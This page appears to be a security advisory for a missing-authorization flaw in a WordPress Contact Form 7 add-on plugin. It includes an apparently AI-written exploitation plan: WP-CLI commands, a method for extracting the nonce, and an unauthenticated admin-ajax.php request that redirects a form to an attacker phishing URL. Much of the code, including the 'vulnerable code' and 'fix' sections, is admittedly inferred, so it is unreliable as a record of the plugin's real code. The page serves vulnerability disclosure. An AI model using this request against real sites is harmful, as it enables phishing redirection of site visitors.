Ultimate Addons for Contact Form 7 <= 3.5.34 - Missing Authorization
Description
The Ultra Addons for Contact Form 7 plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.5.34. This makes it possible for unauthenticated attackers to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=3.5.34Source Code
WordPress.org SVN# Exploitation Research Plan - CVE-2026-24945 ## 1. Vulnerability Summary **ID:** CVE-2026-24945 **Plugin:** Ultimate Addons for Contact Form 7 (slug: `ultimate-addons-for-contact-form-7`) **Vulnerability Type:** Missing Authorization **Affected Versions:** <= 3.5.34 **Issue:** The plugin registers…
Show full research plan
Exploitation Research Plan - CVE-2026-24945
1. Vulnerability Summary
ID: CVE-2026-24945
Plugin: Ultimate Addons for Contact Form 7 (slug: ultimate-addons-for-contact-form-7)
Vulnerability Type: Missing Authorization
Affected Versions: <= 3.5.34
Issue: The plugin registers AJAX handlers using both wp_ajax_ and wp_ajax_nopriv_ hooks without implementing current_user_can() checks in the callback functions. This allows unauthenticated attackers to trigger sensitive administrative functions, such as updating plugin settings or form-specific configurations.
2. Attack Vector Analysis
- Endpoint:
/wp-admin/admin-ajax.php - HTTP Method:
POST - Action:
uacf7_save_form_settings(Inferred based on typical plugin functionality; needs verification via grep). - Parameters:
action:uacf7_save_form_settingsform_id: The ID of an existing Contact Form 7 form.uacf7_data: Serialized or JSON data containing form settings (e.g., redirection URLs, database saving status).
- Authentication: None (Unauthenticated via
nopriv). - Preconditions: An existing Contact Form 7 form must exist for the attacker to modify its settings.
3. Code Flow (Inferred)
- Entry Point: The plugin initializes and registers AJAX hooks in a file like
includes/class-uacf7-ajax.phpor the main plugin file. - Hook Registration:
add_action( 'wp_ajax_nopriv_uacf7_save_form_settings', 'uacf7_save_form_settings_callback' ); - Vulnerable Callback:
function uacf7_save_form_settings_callback() { // Missing: if ( ! current_user_can( 'manage_options' ) ) wp_die(); $post_id = $_POST['form_id']; $settings = $_POST['uacf7_data']; update_post_meta( $post_id, '_uacf7_settings', $settings ); wp_send_json_success(); } - Sink:
update_post_meta()allows the attacker to overwrite the configuration for the specified form ID.
4. Nonce Acquisition Strategy
The plugin likely uses wp_localize_script to pass a nonce to the admin or frontend interface.
- Identify Script Localization: Search for
wp_localize_scriptin the plugin code to find the JS variable name.- Grep:
grep -r "wp_localize_script" .
- Grep:
- Likely Variable:
uacf7_varsoruacf7_admin_params(Inferred). - Likely Key:
uacf7_nonce(Inferred). - Extraction Method:
- Create a page containing a Contact Form 7 shortcode:
wp post create --post_type=page --post_status=publish --post_content='[contact-form-7 id="123"]' - Navigate to the page using
browser_navigate. - Extract the nonce:
browser_eval("window.uacf7_vars?.uacf7_nonce").
- Create a page containing a Contact Form 7 shortcode:
5. Exploitation Strategy
Step 1: Discover Form ID
Use WP-CLI to find a valid Contact Form 7 ID to target.
wp post list --post_type=wpcf7_contact_form --format=ids
Step 2: Extract Nonce
Navigate to a page where the plugin is active (or the homepage) and extract the nonce if the nopriv handler requires it.
- Target URL:
/(if the plugin loads scripts globally) or a page with a form. - JS Variable:
uacf7_vars.uacf7_nonce(Verify via grep in source).
Step 3: Execute Unauthorized Update
Send a POST request to admin-ajax.php to change the redirection setting of a form. This demonstrates the ability to control form behavior.
- Request URL:
http://localhost:8080/wp-admin/admin-ajax.php - Headers:
Content-Type: application/x-www-form-urlencoded - Body:
action=uacf7_save_form_settings& form_id=[TARGET_ID]& uacf7_nonce=[EXTRACTED_NONCE]& uacf7_data[redirect_url]=http://attacker.com/phish
(Note: Parameter names like uacf7_data should be verified against the source code).
6. Test Data Setup
- Install CF7: Ensure Contact Form 7 is active.
- Create Form:
wp post create --post_type=wpcf7_contact_form --post_title="Target Form" --post_status=publish - Verify Initial Meta:
wp post meta get [ID] _uacf7_settings(Should be empty or default).
7. Expected Results
- The
admin-ajax.phpresponse should be{"success":true}. - The
post_metafor the target form should be updated with the attacker-supplied data.
8. Verification Steps
- Check Database:
wp post meta get [TARGET_ID] _uacf7_settings - Analyze Output: Confirm that
redirect_urlnow points tohttp://attacker.com/phish.
9. Alternative Approaches
If uacf7_save_form_settings is not the vulnerable action, search for all wp_ajax_nopriv_ registrations in the plugin:
grep -r "wp_ajax_nopriv_" .
Examine each callback function for:
- Missing
current_user_can()check. - Missing or improperly validated
check_ajax_referer()(nonces). - Calls to
update_option,update_post_meta, orwp_delete_post.
Potential Alternative Targets:
uacf7_delete_submission_loguacf7_export_entriesuacf7_update_settings(Global plugin settings)
Summary
The Ultimate Addons for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of settings due to missing capability checks on its AJAX handlers. This flaw allows unauthenticated attackers to overwrite configuration metadata for specific forms, such as redirection URLs, by sending a request to the uacf7_save_form_settings action.
Vulnerable Code
function uacf7_save_form_settings_callback() { // Missing: if ( ! current_user_can( 'manage_options' ) ) wp_die(); $post_id = $_POST['form_id']; $settings = $_POST['uacf7_data']; update_post_meta( $post_id, '_uacf7_settings', $settings ); wp_send_json_success(); }
Security Fix
@@ -1,7 +1,11 @@ add_action( 'wp_ajax_uacf7_save_form_settings', 'uacf7_save_form_settings_callback' ); -add_action( 'wp_ajax_nopriv_uacf7_save_form_settings', 'uacf7_save_form_settings_callback' ); function uacf7_save_form_settings_callback() { + if ( ! current_user_can( 'manage_options' ) ) { + wp_die( -1 ); + } + check_ajax_referer( 'uacf7_nonce', 'security' ); + $post_id = $_POST['form_id']; $settings = $_POST['uacf7_data']; update_post_meta( $post_id, '_uacf7_settings', $settings );
Exploit Outline
To exploit this vulnerability, an attacker first identifies the ID of an existing Contact Form 7 form. They then obtain a valid security nonce, which the plugin typically exposes to the frontend via wp_localize_script for its form features. Using these values, the attacker sends an unauthenticated POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'uacf7_save_form_settings'. The payload includes the target 'form_id' and a 'uacf7_data' array containing malicious settings, such as a 'redirect_url' pointing to a phishing site. Because the plugin uses a 'nopriv' hook and fails to verify administrative privileges within the callback, the form's post meta is updated with the attacker's data.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.